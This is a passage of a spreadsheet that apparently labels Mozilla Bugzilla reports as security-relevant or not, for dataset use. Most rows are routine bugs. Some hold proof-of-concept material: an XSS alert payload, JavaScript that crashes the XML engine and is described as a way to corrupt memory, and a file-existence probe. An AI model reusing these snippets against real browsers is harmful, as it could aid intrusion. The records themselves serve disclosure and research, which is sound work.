HTML code : &lt;script&gt;񀀍alert񀀍(񀀍document񀀍.񀀍domain񀀍)&lt;/script&gt; // It should alert "document.domain" property.</t>
        </is>
      </c>
      <c r="X5695" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5696">
      <c r="A5696" t="n">
        <v>791432</v>
      </c>
      <c r="B5696" t="inlineStr">
        <is>
          <t>2012-09-14 22:12:56 -0700</t>
        </is>
      </c>
      <c r="C5696" t="inlineStr">
        <is>
          <t>WebGL canvases of width &lt;= 16 contain uninitialized memory upon creation on HTC One S</t>
        </is>
      </c>
      <c r="D5696" t="inlineStr">
        <is>
          <t>2013-11-25 16:40:52 -0800</t>
        </is>
      </c>
      <c r="E5696" t="n">
        <v>1</v>
      </c>
      <c r="F5696" t="n">
        <v>1</v>
      </c>
      <c r="G5696" t="n">
        <v>3</v>
      </c>
      <c r="H5696" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5696" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5696" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K5696" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5696" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5696" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5696" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5696" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5696" t="inlineStr">
        <is>
          <t>[adv-main21+]</t>
        </is>
      </c>
      <c r="Q5696" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5696" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5696" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T5696" t="n">
        <v>1</v>
      </c>
      <c r="U5696" t="n">
        <v>0</v>
      </c>
      <c r="V5696" t="n">
        <v>23</v>
      </c>
      <c r="W5696" t="inlineStr">
        <is>
          <t>Created attachment 661462
testcase
STR: load testcase
Expected: blank page
Actual: hit reload a few times, see some random junk.
Tested on a HTC One S with a Adreno 225 GPU.</t>
        </is>
      </c>
      <c r="X5696" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5697">
      <c r="A5697" t="n">
        <v>354145</v>
      </c>
      <c r="B5697" t="inlineStr">
        <is>
          <t>2006-09-25 08:48:13 -0700</t>
        </is>
      </c>
      <c r="C5697" t="inlineStr">
        <is>
          <t>Wrong assumptions about immutable XML</t>
        </is>
      </c>
      <c r="D5697" t="inlineStr">
        <is>
          <t>2006-11-10 11:32:43 -0800</t>
        </is>
      </c>
      <c r="E5697" t="n">
        <v>1</v>
      </c>
      <c r="F5697" t="n">
        <v>1</v>
      </c>
      <c r="G5697" t="n">
        <v>3</v>
      </c>
      <c r="H5697" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5697" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5697" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5697" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5697" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5697" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5697" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5697" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5697" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5697" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5697" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5697" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5697" t="n">
        <v>1</v>
      </c>
      <c r="U5697" t="n">
        <v>0</v>
      </c>
      <c r="V5697" t="n">
        <v>93</v>
      </c>
      <c r="W5697" t="inlineStr">
        <is>
          <t>Consider the following example:
var xml = &lt;&gt;&lt;/&gt;
var N = 10;
for (var i = 0; i != N; ++i) {
  xml[i] = &lt;{"a"+i}/&gt;;
}
function prepare()
{
  for (var i = N - 1; i &gt;= 0; --i)
    delete xml[i];
  gc();
  return "test";
}
xml[N - 1] = { toString: prepare };
Currently it crashes the shell since PutProperty in jsxml.c assumes that after ensuring that the insert index is less then the list length, the list length would not change. This is wrong since the code later  convert the passed value to string which can execute arbitrary scrip code that modifies the list.
In the above example the crash happens when accessing NULL pointer, but its modification can be used to reinterpret as XML object arbitrary script-controlled memory.</t>
        </is>
      </c>
      <c r="X5697" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5698">
      <c r="A5698" t="n">
        <v>1224200</v>
      </c>
      <c r="B5698" t="inlineStr">
        <is>
          <t>2015-11-12 06:14:58 -0800</t>
        </is>
      </c>
      <c r="C5698" t="inlineStr">
        <is>
          <t>Assertion failure: mCurrentOutLine &lt; mTargetSize.height (Past end of output), at  c:/Users/mozilla/debug-builds/mozilla-central/image/Downscaler.cpp:198</t>
        </is>
      </c>
      <c r="D5698" t="inlineStr">
        <is>
          <t>2016-09-22 14:41:31 -0700</t>
        </is>
      </c>
      <c r="E5698" t="n">
        <v>1</v>
      </c>
      <c r="F5698" t="n">
        <v>1</v>
      </c>
      <c r="G5698" t="n">
        <v>3</v>
      </c>
      <c r="H5698" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5698" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5698" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K5698" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5698" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5698" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5698" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5698" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5698" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main44+][adv-esr38.6+]</t>
        </is>
      </c>
      <c r="Q5698" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5698" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5698" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T5698" t="n">
        <v>1</v>
      </c>
      <c r="U5698" t="n">
        <v>0</v>
      </c>
      <c r="V5698" t="n">
        <v>36</v>
      </c>
      <c r="W5698" t="inlineStr">
        <is>
          <t>Created attachment 8686598
windbg information
Found via bughunter on http://www.bottari.pl/
STR:
-&gt; Load http://www.bottari.pl/ 
--&gt;
Assertion failure: mCurrentOutLine &lt; mTargetSize.height (Past end of output), at
 c:/Users/mozilla/debug-builds/mozilla-central/image/Downscaler.cpp:198
filing as s-s bug just in case</t>
        </is>
      </c>
      <c r="X5698" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5699">
      <c r="A5699" t="n">
        <v>1454430</v>
      </c>
      <c r="B5699" t="inlineStr">
        <is>
          <t>2018-04-16 10:29:30 -0700</t>
        </is>
      </c>
      <c r="C5699" t="inlineStr">
        <is>
          <t>Crash in static struct mozilla::layers::CompositorBridgeParent::LayerTreeState* mozilla::layers::GetStateForRoot</t>
        </is>
      </c>
      <c r="D5699" t="inlineStr">
        <is>
          <t>2018-04-17 14:58:15 -0700</t>
        </is>
      </c>
      <c r="E5699" t="n">
        <v>1</v>
      </c>
      <c r="F5699" t="n">
        <v>1</v>
      </c>
      <c r="G5699" t="n">
        <v>3</v>
      </c>
      <c r="H5699" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5699" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5699" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K5699" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5699" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5699" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N5699" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5699" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5699" t="inlineStr">
        <is>
          <t>[gfx-noted]</t>
        </is>
      </c>
      <c r="Q5699" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5699" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5699" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T5699" t="n">
        <v>1</v>
      </c>
      <c r="U5699" t="n">
        <v>0</v>
      </c>
      <c r="V5699" t="n">
        <v>8</v>
      </c>
      <c r="W5699" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-ed31171e-b59a-4019-8b2c-585ca0180404.
=============================================================
Seen while looking at nightly crash data - small volume regression which looks to have started using Build 20180316100132: https://bit.ly/2viYCSd.
Possible regression range based on Build ID: https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=68dfe5ee5b80ee99b7e389d739a30089f6f1e55d&amp;tochange=c488b8d0e074efb490ebca32db68eb77871bfd2f
Bug 1445662 landed in that timeframe. ni on :kats
Top 10 frames of crashing thread:
0 xul.dll static struct mozilla::layers::CompositorBridgeParent::LayerTreeState* mozilla::layers::GetStateForRoot gfx/layers/ipc/CompositorBridgeParent.cpp:2190
1 xul.dll mozilla::layers::CompositorBridgeParent::GetApzcTreeManagerParentForRoot gfx/layers/ipc/CompositorBridgeParent.cpp:2203
2 xul.dll mozilla::layers::RemoteContentController::CancelAutoscrollCrossProcess gfx/layers/ipc/RemoteContentController.cpp:387
3 xul.dll mozilla::layers::AutoscrollAnimation::Cancel gfx/layers/apz/src/AutoscrollAnimation.cpp:94
4 xul.dll mozilla::layers::AsyncPanZoomController::CancelAnimation gfx/layers/apz/src/AsyncPanZoomController.cpp:3094
5 xul.dll mozilla::layers::AsyncPanZoomController::Destroy gfx/layers/apz/src/AsyncPanZoomController.cpp:853
6 xul.dll mozilla::layers::HitTestingTreeNode::Destroy gfx/layers/apz/src/HitTestingTreeNode.cpp:69
7 xul.dll mozilla::layers::APZCTreeManager::ClearTree gfx/layers/apz/src/APZCTreeManager.cpp:2112
8 xul.dll mozilla::detail::RunnableMethodImpl&lt;nsIDocument*, void  xpcom/threads/nsThreadUtils.h:1215
9 xul.dll mozilla::layers::APZUpdater::RunOnUpdaterThread gfx/layers/apz/src/APZUpdater.cpp:214
=============================================================</t>
        </is>
      </c>
      <c r="X5699" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5700">
      <c r="A5700" t="n">
        <v>1165321</v>
      </c>
      <c r="B5700" t="inlineStr">
        <is>
          <t>2015-05-15 07:03:12 -0700</t>
        </is>
      </c>
      <c r="C5700" t="inlineStr">
        <is>
          <t>Do not open a new window when the Firefox icon is clicked on the taskbar/start menu/start screen while Firefox is in windows 10 tablet mode</t>
        </is>
      </c>
      <c r="D5700" t="inlineStr">
        <is>
          <t>2015-07-23 02:35:30 -0700</t>
        </is>
      </c>
      <c r="E5700" t="n">
        <v>1</v>
      </c>
      <c r="F5700" t="n">
        <v>1</v>
      </c>
      <c r="G5700" t="n">
        <v>2</v>
      </c>
      <c r="H5700" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5700" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5700" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5700" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5700" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5700" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5700" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5700" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5700" t="inlineStr"/>
      <c r="Q5700" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5700" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5700" t="inlineStr">
        <is>
          <t>Firefox 42</t>
        </is>
      </c>
      <c r="T5700" t="n">
        <v>1</v>
      </c>
      <c r="U5700" t="n">
        <v>0</v>
      </c>
      <c r="V5700" t="n">
        <v>16</v>
      </c>
      <c r="W5700" t="inlineStr">
        <is>
          <t>STR:
1) bring up the new start screen / start menu
2) click on Firefox
result: firefox launches and a window opens
3) bring the start screen back up
4) click on firefox
result: a new window opens vs. bringing the previous firefox window to the foreground.</t>
        </is>
      </c>
      <c r="X5700" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5701">
      <c r="A5701" t="n">
        <v>1614477</v>
      </c>
      <c r="B5701" t="inlineStr">
        <is>
          <t>2020-02-10 13:35:32 -0800</t>
        </is>
      </c>
      <c r="C5701" t="inlineStr">
        <is>
          <t>doc: dxr links are deprecated</t>
        </is>
      </c>
      <c r="D5701" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E5701" t="n">
        <v>1</v>
      </c>
      <c r="F5701" t="n">
        <v>1</v>
      </c>
      <c r="G5701" t="n">
        <v>7</v>
      </c>
      <c r="H5701" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5701" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J5701" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K5701" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5701" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5701" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5701" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5701" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5701" t="inlineStr">
        <is>
          <t>[lang=python]</t>
        </is>
      </c>
      <c r="Q5701" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R5701" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S5701" t="inlineStr">
        <is>
          <t>mozilla78</t>
        </is>
      </c>
      <c r="T5701" t="n">
        <v>1</v>
      </c>
      <c r="U5701" t="n">
        <v>0</v>
      </c>
      <c r="V5701" t="n">
        <v>11</v>
      </c>
      <c r="W5701" t="inlineStr">
        <is>
          <t>They should be updated to searchfox and they are not pointing the right file.
https://firefox-source-docs.mozilla.org/tools/lint/coding-style/format_cpp_code_with_clang-format.html
The correct file is probably:
https://searchfox.org/mozilla-central/source/python/mozbuild/mozbuild/code-analysis/mach_commands.py</t>
        </is>
      </c>
      <c r="X5701" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5702">
      <c r="A5702" t="n">
        <v>1248876</v>
      </c>
      <c r="B5702" t="inlineStr">
        <is>
          <t>2016-02-16 23:57:09 -0800</t>
        </is>
      </c>
      <c r="C5702" t="inlineStr">
        <is>
          <t>Graphite2 Machine::Code::decoder::analysis::set_ref stack out of bounds bit set</t>
        </is>
      </c>
      <c r="D5702" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:36 -0700</t>
        </is>
      </c>
      <c r="E5702" t="n">
        <v>1</v>
      </c>
      <c r="F5702" t="n">
        <v>1</v>
      </c>
      <c r="G5702" t="n">
        <v>3</v>
      </c>
      <c r="H5702" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5702" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5702" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5702" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5702" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5702" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5702" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5702" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5702" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q5702" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5702" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5702" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T5702" t="n">
        <v>1</v>
      </c>
      <c r="U5702" t="n">
        <v>0</v>
      </c>
      <c r="V5702" t="n">
        <v>33</v>
      </c>
      <c r="W5702" t="inlineStr">
        <is>
          <t>Its possible to trigger an out of bounds bit set with special crafted graphite fonts. This gives the ability to corrupt the stack in various ways.
I have tested the pocs with the current nightly asan build. Poc 1 shows the out of bounds access, Poc 2 shows a use after free which can for example triggered with the vulnerability.</t>
        </is>
      </c>
      <c r="X5702" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5703">
      <c r="A5703" t="n">
        <v>1766047</v>
      </c>
      <c r="B5703" t="inlineStr">
        <is>
          <t>2022-04-22 11:51:30 -0700</t>
        </is>
      </c>
      <c r="C5703" t="inlineStr">
        <is>
          <t>Verify that version of downloaded XPI matches with the version from the update manifest</t>
        </is>
      </c>
      <c r="D5703" t="inlineStr">
        <is>
          <t>2023-01-16 20:32:22 -0800</t>
        </is>
      </c>
      <c r="E5703" t="n">
        <v>1</v>
      </c>
      <c r="F5703" t="n">
        <v>1</v>
      </c>
      <c r="G5703" t="n">
        <v>3</v>
      </c>
      <c r="H5703" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5703" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J5703" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5703" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5703" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5703" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5703" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5703" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5703" t="inlineStr">
        <is>
          <t>[addons-jira][post-critsmash-triage][adv-main102+]</t>
        </is>
      </c>
      <c r="Q5703" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5703" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5703" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T5703" t="n">
        <v>1</v>
      </c>
      <c r="U5703" t="n">
        <v>0</v>
      </c>
      <c r="V5703" t="n">
        <v>5</v>
      </c>
      <c r="W5703" t="inlineStr">
        <is>
          <t>We have [logic that only select new versions from the update manifest](https://searchfox.org/mozilla-central/rev/5204ea3d3dac5832075fb61d9689dd7879ed91b2/toolkit/mozapps/extensions/internal/AddonUpdateChecker.jsm#542-633). But after downloading we don't confirm whether the downloaded version matches the expected version. To avoid unintended downgrades when the update manifest has been tampered with on the server's end, we should prevent this from happening.</t>
        </is>
      </c>
      <c r="X5703" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5704">
      <c r="A5704" t="n">
        <v>575836</v>
      </c>
      <c r="B5704" t="inlineStr">
        <is>
          <t>2010-06-29 16:50:18 -0700</t>
        </is>
      </c>
      <c r="C5704" t="inlineStr">
        <is>
          <t>free() of garbage values when an &lt;object&gt; has a |data=""| attribute and no "src" attribute  --&gt; crash  [@ free | nsPluginInstanceOwner::~nsPluginInstanceOwner() ]</t>
        </is>
      </c>
      <c r="D5704" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5704" t="n">
        <v>1</v>
      </c>
      <c r="F5704" t="n">
        <v>1</v>
      </c>
      <c r="G5704" t="n">
        <v>6</v>
      </c>
      <c r="H5704" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5704" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5704" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5704" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5704" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5704" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5704" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5704" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5704" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5704" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5704" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5704" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5704" t="n">
        <v>1</v>
      </c>
      <c r="U5704" t="n">
        <v>0</v>
      </c>
      <c r="V5704" t="n">
        <v>60</v>
      </c>
      <c r="W5704" t="inlineStr">
        <is>
          <t>OS: Ubuntu Maverick (10.10) pre-release
STR:
 1. Load URL
   http://itunes.apple.com/us/podcast/the-bugle-audio-newspaper/id265799883
ACTUAL RESULTS: Immediate crash in opt build; shutdown crash in debug build.
NOTE: This doesn't affect my other machine running an earlier Ubuntu version (10.04).
On the broken machine, if I disable the "QuickTime Plug-in 7.6.6" in about:addons, it fixes the problem. (Note: this plugin's subtitle shows that it's actually handled by "The Totem 2.30.2 plugin", since this is Linux and there's no _actual_ Quicktime support)  So, this is probably due to a totem bug, but I'm filing here because it crashes Firefox and I'd hope that OOPP would prevent that.
Firefox version:
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:2.0b2pre) Gecko/20100629 Minefield/4.0b2pre
TOTEM PLUGIN VERSIONS:
  Working Ubuntu 10.04 box: 2.30.2-0ubuntu1
  Broken  Ubuntu 10.10 box: 2.30.2-2ubuntu2</t>
        </is>
      </c>
      <c r="X5704" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5705">
      <c r="A5705" t="n">
        <v>1069290</v>
      </c>
      <c r="B5705" t="inlineStr">
        <is>
          <t>2014-09-18 05:32:37 -0700</t>
        </is>
      </c>
      <c r="C5705" t="inlineStr">
        <is>
          <t>Remove redundant "--settings treeherder.settings" from update.py</t>
        </is>
      </c>
      <c r="D5705" t="inlineStr">
        <is>
          <t>2014-09-23 05:38:11 -0700</t>
        </is>
      </c>
      <c r="E5705" t="n">
        <v>1</v>
      </c>
      <c r="F5705" t="n">
        <v>1</v>
      </c>
      <c r="G5705" t="n">
        <v>7</v>
      </c>
      <c r="H5705" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5705" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5705" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5705" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5705" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5705" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5705" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5705" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5705" t="inlineStr"/>
      <c r="Q5705" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5705" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5705" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5705" t="n">
        <v>1</v>
      </c>
      <c r="U5705" t="n">
        <v>0</v>
      </c>
      <c r="V5705" t="n">
        <v>6</v>
      </c>
      <c r="W5705" t="inlineStr">
        <is>
          <t>manage.py set the DJANGO_SETTINGS_MODULE env variable:
https://github.com/mozilla/treeherder-service/blob/master/manage.py#L6
So afaict we shouldn't need to pass in the --settings treeherder.settings in update.py:
https://github.com/mozilla/treeherder-service/blob/master/deployment/update/update.py#L20
https://github.com/mozilla/treeherder-service/blob/master/deployment/update/update.py#L47
According to:
https://docs.djangoproject.com/en/1.5/topics/settings/#designating-the-settings
Not exactly high priority, but:
a) If we ever change the settings value in manage.py, update.py will be out of sync
b) I was using update.py as a command cheatsheet and was pointlessly typing out the --settings foo each time.</t>
        </is>
      </c>
      <c r="X5705" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5706">
      <c r="A5706" t="n">
        <v>1295023</v>
      </c>
      <c r="B5706" t="inlineStr">
        <is>
          <t>2016-08-14 06:42:09 -0700</t>
        </is>
      </c>
      <c r="C5706" t="inlineStr">
        <is>
          <t>Ability to determine the existence of a file in the local filesystem</t>
        </is>
      </c>
      <c r="D5706" t="inlineStr">
        <is>
          <t>2017-01-25 07:13:53 -0800</t>
        </is>
      </c>
      <c r="E5706" t="n">
        <v>1</v>
      </c>
      <c r="F5706" t="n">
        <v>1</v>
      </c>
      <c r="G5706" t="n">
        <v>3</v>
      </c>
      <c r="H5706" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5706" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5706" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K5706" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L5706" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5706" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5706" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5706" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5706" t="inlineStr">
        <is>
          <t>[adv-main51+] local attack</t>
        </is>
      </c>
      <c r="Q5706" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5706" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5706" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T5706" t="n">
        <v>1</v>
      </c>
      <c r="U5706" t="n">
        <v>0</v>
      </c>
      <c r="V5706" t="n">
        <v>10</v>
      </c>
      <c r="W5706" t="inlineStr">
        <is>
          <t>Created attachment 8780916
ff-file-enumeration.html
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Build ID: 20160802213348
Steps to reproduce:
The issue exists because a &lt;track&gt; tag's onerror event is triggered twice if the file referenced in it's src attribute doesn't exist, while it's only triggered once if the file exists but not playable.
Please check the attached file for a PoC. Change the path to the file in the src attribute in the &lt;track&gt; tag for the different behaviors explained.
Actual results:
The onerror event for the &lt;track&gt; tag is fired twice if the file doesn't exist and once if it does.
Expected results:
The onerror event should be fired the same number of times for both cases.</t>
        </is>
      </c>
      <c r="X5706" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5707">
      <c r="A5707" t="n">
        <v>2190</v>
      </c>
      <c r="B5707" t="inlineStr">
        <is>
          <t>1999-01-05 16:48:31 -0800</t>
        </is>
      </c>
      <c r="C5707" t="inlineStr">
        <is>
          <t>[PP] NSPR building incorrectly on FreeBSD 3.0</t>
        </is>
      </c>
      <c r="D5707" t="inlineStr">
        <is>
          <t>2000-03-22 13:29:17 -0800</t>
        </is>
      </c>
      <c r="E5707" t="n">
        <v>1</v>
      </c>
      <c r="F5707" t="n">
        <v>1</v>
      </c>
      <c r="G5707" t="n">
        <v>3</v>
      </c>
      <c r="H5707" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5707" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J5707" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K5707" t="inlineStr">
        <is>
          <t>3.0</t>
        </is>
      </c>
      <c r="L5707" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5707" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N5707" t="inlineStr">
        <is>
          <t>CLOSED</t>
        </is>
      </c>
      <c r="O5707" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5707" t="inlineStr"/>
      <c r="Q5707" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5707" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5707" t="inlineStr">
        <is>
          <t>3.1</t>
        </is>
      </c>
